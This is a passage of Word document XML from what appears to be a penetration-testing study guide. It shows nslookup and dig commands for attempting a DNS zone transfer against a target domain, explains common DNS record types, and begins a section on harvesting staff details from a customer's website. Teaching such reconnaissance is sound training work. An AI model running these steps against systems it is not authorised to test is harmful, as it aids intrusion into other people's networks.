          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="00801C3F" w:rsidRDefault="006C3C88" w:rsidP="004575D7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="004575D7" w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>slookup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004575D7" w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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c:\nslookup</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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;found_SOA/NS_for_domain&gt;</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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –d &lt;domain_name&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; zone.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="006C3C88" w:rsidRDefault="004575D7" w:rsidP="004575D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="00801C3F" w:rsidRDefault="004575D7" w:rsidP="004575D7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C3C88" w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="006C3C88" w:rsidRDefault="004575D7" w:rsidP="006C3C88">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C3C88">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> @&lt;name_server&gt; &lt;domain_name&gt; axfr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004575D7" w:rsidRPr="004575D7" w:rsidRDefault="004575D7" w:rsidP="004575D7"/>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C2c - Structure, interpretation and analysis of DNS records:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>SOA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="00664450" w:rsidP="004C62A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SOA - </w:t>
      </w:r>
      <w:r w:rsidRPr="00664450">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Start of Authorities record describes some key data about the zone as defined by the zone administrator (on the domain master machine). It includes things such as the contact address for the admin, and the amount of time that slave nameservers should hang onto the zone in case the master is unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="004C62A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="004C62A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Structure of SOA record:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="004C62A3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Domain root name | TTL | Class | Type | Name Server | Email | Serial | Refresh | Retry | Expiry | Minimum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="004C62A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TTL</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">14400 </w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- TTL defines the duration in seconds that the record may be cached by client side programs. If it is set as 0, it indicates that the record should not be cached. The range is defined to be between 0 to 2147483647 (close to 68 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>years !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Class </w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IN</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - The class shows the type of record. IN equates to Internet. Other options are all historic. So as long as your DNS is on the Internet or Intranet, you must use IN. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidR="00552347" w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ns.nameserver.com. - The nameserver is the server which holds the zone files. It can be either an external server in which case, the entire domain name must be specified followed by a dot. In case it is defined in this zone file, then it can be written as ``</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ns'' .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Email address</w:t>
      </w:r>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00801C3F" w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root.ns.nameserver.com</w:t>
      </w:r>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This is the email of the domain name administrator. Now, this is really confusing, because people expect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> @ to be in an email address. However in this case, email is sent to root@ns.nameserver.com, but wr</w:t>
      </w:r>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>itten as root.ns.nameserver.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. And yes, remember to put the dot behind the domain name. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Serial number</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2004123001</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This is a sort of a revision numbering system to show the changes made to the DNS Zon</w:t>
      </w:r>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e. This number has to increment</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, whenever any change is made to the Zone file. The standard convention is to use the date of update YYYYMMDDnn, where nn is a revision number in case more than one updates are done in a day. So if the first update done today would be 2005301200 and second update would be 2005301201. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Refresh</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>86000</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This is time</w:t>
      </w:r>
      <w:r w:rsidR="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(in seconds) when the slave DNS server will refresh from the master. This value represents how often a secondary will poll the primary server to see if the serial number for the zone has increased (so it knows to request a new copy of the data for the zone). It can be written as ``23h88M'' indicating 23 hours and 88 minutes. If you have a regular Internet server, you can keep it between 6 to 24 hours. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Retry</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7200</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Now assume that a slave tried to contact the master server and failed to contact it because it was down. The Retry value (time in seconds) will tell it when to get back. This value is not very important and can be a fraction of the refresh value. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C62A3" w:rsidRPr="00552347" w:rsidRDefault="004C62A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Expiry</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3600000</w:t>
      </w:r>
      <w:r w:rsidRPr="00552347">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This is the time (in seconds) that a slave server will keep a cached zone file as valid, if it can't contact the primary server. If this value were set to say 2 weeks ( in seconds), what it means is that a slave would still be able to give out domain information from its cached zone file for 2 weeks, without anyone knowing the difference. The recommended value is between 2 to 4 weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801C3F" w:rsidRPr="00801C3F" w:rsidRDefault="00801C3F" w:rsidP="00801C3F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The MX record encodes the name of a Mail Exchanger, a system responsible for handling email for the given domain. Multiple MX records can be provided for a domain (they included way to specify priority). Email server software is the main consumer of MX resource records. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TXT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801C3F" w:rsidRPr="00801C3F" w:rsidRDefault="00801C3F" w:rsidP="00801C3F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TXT - A generic Text record that provides descriptive data about domain. These are essentially comments, information associated with name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801C3F" w:rsidRPr="00801C3F" w:rsidRDefault="00801C3F" w:rsidP="00801C3F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A - This is an IP Address (host) record, and is the most obvious type of data supported by DNS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>NS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801C3F" w:rsidRPr="00801C3F" w:rsidRDefault="00801C3F" w:rsidP="00801C3F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NS - This describes an authoritative nameserver record responsible for the domain asked about.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PTR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801C3F" w:rsidRPr="00801C3F" w:rsidRDefault="00801C3F" w:rsidP="00801C3F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801C3F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PTR - Reverse records (Ipv4 to Host)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>HINFO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00664450" w:rsidRPr="00664450" w:rsidRDefault="00664450" w:rsidP="00664450">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00664450">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HINFO - Defines the Hardware type and Operating System (OS) in use on a host. For security reasons these records are rarely used on public servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4D72" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CNAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00664450" w:rsidRDefault="00801C3F" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00664450">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CNAME - The Canonical Name, more commonly known as an Alias, this allows providing an alternate name for a resource.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46"/>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>C3 - Customer Web Site Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00C741C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t xml:space="preserve">Analysis of information from a target web site, both from displayed content </w:t>
      </w:r>
      <w:r>
        <w:t>and from within the HTML source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00C741C1" w:rsidRDefault="00664450" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer Web sites may contain contact information such as address, employee details (name, email, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phone</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
